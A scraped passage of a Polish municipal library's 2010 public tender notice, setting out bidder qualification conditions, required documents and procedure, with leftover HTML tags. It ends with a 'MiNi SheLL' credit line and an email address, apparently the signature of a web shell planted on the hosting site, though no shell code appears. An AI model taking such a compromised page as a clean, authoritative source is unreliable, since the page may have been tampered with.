W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie . 

2.1.4 posiadają  środki finansowe lub zdolność kredytową  w wysokości  nie mniejszej niż 200 000 PLN .
Spełnieniem tego warunku będzie posiadanie środków finansowych lub zdolności kredytowej w wymaganej wysokości .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten  Wykonawcy mogą spełnić  łącznie.

 2.1.5.  posiadają opłaconą  polisę  ubezpieczeniową , a w przypadku jej braku ,innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimalną  100 000 PLN i na okres trwania zamówienia. W razie gdy  ubezpieczenie obejmuje okres krótszy , Wykonawca  składa zobowiązanie do zawarcia nowego  ubezpieczenia , na czas co najmniej do końca trwania umowy na wykonanie zamówienia .
Spełnieniem tego warunku będzie posiadania opłaconej polisy  ubezpieczeniowej lub innego dokumenty potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnej z przedmiotem niniejszego zamówienia na kwotę minimalną 100 000 PLN a ubezpieczenie obejmuje okres do końca trwania umowy .
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek ten   każdy Wykonawca musi spełnić oddzielnie .

3.Wykonawca może polegać na wiedzy i doświadczeniu ,potencjale technicznym ,osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie od charakteru prawnego łączących go z nimi stosunków .Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia ,w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania  mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
	
 3. W celu wykazana spełnienia warunków udziału w postępowaniu  określonych w  ust. 2.1 każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty :

3.1.  oświadczenie o spełnianiu warunków - art. 22 ust. 1 Ustawy - zał nr 3 do SIWZ

3.2 Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku  wiedzy i doświadczenia , wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich  rodzaju i wartości ,daty i miejsca wykonania oraz  załączeniem dokumentu potwierdzającego , że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone .-zał. nr  4  do SIWZ

3.3.wykaz osób  ,które będą uczestniczyć w wykonywaniu zamówienia  do kierowania robotami budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego  do wykonywania zamówienia a także zakresu wykonywanych przez nie czynności  wraz z oświadczeniem ,że osoby wymienione w wykazie posiadają wymagane uprawnienia budowlane , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień , oraz informacji o podstawie dysponowania tymi osobami i pisemnego zobowiązania  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia ,jeżeli w wykazie Wykonawca wsadzał osoby, którymi będzie dysponował  - zał  nr  5 do SIWZ

3.4 informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej , w których Wykonawca posiada rachunek ,potwierdzającej wysokość posiadanych środków finansowych lub zdolność  kredytową  wykonawcy, wystawioną nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert 

3.5 opłaconej  polisy a w przypadku jej braku, innego dokumentu potwierdzającego ,że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia . 
W razie gdy ubezpieczenie obejmuje krótszy okres Wykonawca  składa zobowiązanie do zawarcia nowego  ubezpieczenia , na czas co najmniej do końca trwania umowy na wykonanie zamówienia .-zał. nr 6   do SIWZ

4.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia  albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego - zgodnie z postanowieniami art. 23 Ustawy. 
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem
 W przypadku wyboru oferty wykonawców ubiegających się wspólnie o udzielenie zamówienia Zamawiający przed zawarciem umowy zażąda umowy regulującej współpracę tych wykonawców. 

5.Ocena spełnienia warunków udziału w postępowaniu  zostanie dokonana według formuły ,, spełnia - nie spełnia ,,  w oparciu o informacje zawarte w dokumentach i oświadczeniach  wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty . Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie ,że Wykonawca spełnia wyżej wymienione warunki .

6.Wykonawcy którzy nie spełnią  opisanych warunków udziału w postępowaniu  i  nie wykażą braku podstaw  do wykluczenia a także w przypadku zaistnienia okoliczności o których mowa w art. 24 ust.2  Ustawy , zostaną z postępowania o udzielenie zamówienia publicznego wykluczeni ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminna Biblioteka Publiczna  w Huszlewie 08-206 Huszlew.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 11:00, miejsce: Gminna Biblioteka Publiczna  w Huszlewie 08-206 Huszlew.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com